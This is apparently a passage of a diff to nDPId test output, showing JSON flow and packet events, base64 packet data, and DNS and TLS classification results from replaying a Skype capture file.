-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431969695483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969695483,"pkt":"0NQSxnP1PBXCt3IOCABFAABAoJZAAEAGGuzAqAEib91NjsOmnFcVc978AAAAALAC\/\/\/LYQAAAgQFtAEDAwUBAQgKPiNZ1AAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1431969695778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969695778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxXw6bHcDhRFXPe\/aASOJD2ggAAAgQFrAQCCApNjF\/4PiNZ1AEDAwk="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":3,"flow_last_seen":1431969695779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969695779,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IC9AAEAGm1\/AqAEib91NjsOmnFcVc979x3A4UoAQECxMhgAAAQEICj4jWvtNjF\/4"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969697097,"flow_last_seen":1431969697097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969697097,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1431969697097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969697097,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaXZAAEAGUgzAqAEib91NjsOnAbtL1T0XAAAAALAC\/\/\/LOAAAAgQFtAEDAwUBAQgKPiNgHAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":2,"flow_last_seen":1431969697478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969697478,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIgG7w6e9PNNuS9U9GKASOJBj3AAAAgQFrAQCCApNjGGMPiNgHAEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":3,"flow_last_seen":1431969697478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969697478,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Y41AAEAGWAHAqAEib91NjsOnAbtL1T0YvTzTb4AQECy5igAAAQEICj4jYZhNjGGM"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969697530,"flow_last_seen":1431969697530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969697530,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1431969697530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969697530,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWjtAAEAGlejAqAEinTfrksOogQnO4dHgAAAAALAC\/\/9nBQAAAgQFtAEDAwUBAQgKPiNhywAAAAAEAgAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1431969697602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969697602,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIoEJw6jH8XvBzuHR4aASOJCSaAAAAgQFrAQCCApMXRz0PiNhywEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1431969697602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969697602,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UqNAAEAGnYzAqAEinTfrksOogQnO4dHhx\/F7woAQECzpSwAAAQEICj4jYhJMXRz0"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969695483,"flow_last_seen":1431969695483,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969695483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431969695483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969695483,"pkt":"0NQSxnP1PBXCt3IOCABFAABAoJZAAEAGGuzAqAEib91NjsOmnFcVc978AAAAALAC\/\/\/LYQAAAgQFtAEDAwUBAQgKPiNZ1AAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1431969695778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969695778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxXw6bHcDhRFXPe\/aASOJD2ggAAAgQFrAQCCApNjF\/4PiNZ1AEDAwk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":3,"flow_last_seen":1431969695779,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969695779,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IC9AAEAGm1\/AqAEib91NjsOmnFcVc979x3A4UoAQECxMhgAAAQEICj4jWvtNjF\/4"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969697097,"flow_last_seen":1431969697097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969697097,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1431969697097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969697097,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaXZAAEAGUgzAqAEib91NjsOnAbtL1T0XAAAAALAC\/\/\/LOAAAAgQFtAEDAwUBAQgKPiNgHAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":2,"flow_last_seen":1431969697478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969697478,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIgG7w6e9PNNuS9U9GKASOJBj3AAAAgQFrAQCCApNjGGMPiNgHAEDAwk="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":3,"flow_last_seen":1431969697478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969697478,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Y41AAEAGWAHAqAEib91NjsOnAbtL1T0YvTzTb4AQECy5igAAAQEICj4jYZhNjGGM"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969697530,"flow_last_seen":1431969697530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969697530,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1431969697530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969697530,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWjtAAEAGlejAqAEinTfrksOogQnO4dHgAAAAALAC\/\/9nBQAAAgQFtAEDAwUBAQgKPiNhywAAAAAEAgAA"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1431969697602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969697602,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIoEJw6jH8XvBzuHR4aASOJCSaAAAAgQFrAQCCApMXRz0PiNhywEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1431969697602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969697602,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UqNAAEAGnYzAqAEinTfrksOogQnO4dHhx\/F7woAQECzpSwAAAQEICj4jYhJMXRz0"} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431969698508,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969698508,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABIoEQAAEARVbXAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1431969698743,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969698743,"pkt":"0NQSxnP1PBXCt3IOCABFAABEy5wAAEARK5nAqAEiwKgBAfdZADUAMBpr\/I4BAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":2,"flow_last_seen":1431969698797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969698797,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA191kAQKAy\/I6BgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAABAABBfOIaY="} 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698797,"flow_last_seen":1431969698797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431969698797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969698797,"pkt":"0NQSxnP1PBXCt3IOCABFAABASetAAEAG9Y7AqAEiF84hpsOqAbtGC\/RmAAAAALAC\/\/+XCwAAAgQFtAEDAwUBAQgKPiNmuAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1431969698840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969698840,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w6oZSGV1Rgv0Z6ASOJDhugAAAgQFrAQCCArsLyLPPiNmuAEDAwU="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1431969698840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969698840,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ZSJAAEAG2mPAqAEiF84hpsOqAbtGC\/RnGUhldoAQECw4twAAAQEICj4jZuLsLyLP"} 
-00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1357,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969698797,"flow_last_seen":1431969698841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431969698841,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699142,"flow_last_seen":1431969699142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969699142,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431969699142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969699142,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQstAAEAGrVjAqAEinTfrksOrAbuMrH5PAAAAALAC\/\/911AAAAgQFtAEDAwUBAQgKPiNoDgAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431969699217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969699217,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7w6sASTQ1jKx+UKASOJCu2QAAAgQFrAQCCApMXR6HPiNoDgEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1431969699217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969699217,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ol1AAEAGTdLAqAEinTfrksOrAbuMrH5QAEk0NoAQECwFuQAAAQEICj4jaFlMXR6H"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699577,"flow_last_seen":1431969699577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969699577,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1431969699577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969699577,"pkt":"0NQSxnP1PBXCt3IOCABFAABAuMZAAEAGoFTAqAEinTeCm8OsnFQhlXAyAAAAALAC\/\/+7tgAAAgQFtAEDAwUBAQgKPiNpvQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1371,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1431969699706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969699706,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYh+dN4KbwKgBIpxUw6wV0QgaIZVwM6ASOJCGcAAAAgQFrAQCCApOs6EPPiNpvQEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1431969699706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969699706,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0BLVAAEAGVHLAqAEinTeCm8OsnFQhlXAzFdEIG4AQECzdGQAAAQEICj4jaj5Os6EP"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1390,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969701181,"flow_last_seen":1431969701181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969701181,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1431969701181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969701181,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1hBAAEAGgwrAqAEinTeCm8OuAbux\/OLXAAAAALAC\/\/9NAwAAAgQFtAEDAwUBAQgKPiNv+wAAAAAEAgAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1431969701308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969701308,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYh+dN4KbwKgBIgG7w655m4Wssfzi2KASOJA0zwAAAgQFrAQCCApOs6KgPiNv+wEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1431969701308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969701308,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0yA5AAEAGkRjAqAEinTeCm8OuAbux\/OLYeZuFrYAQECyLfQAAAQEICj4jcHdOs6Kg"} 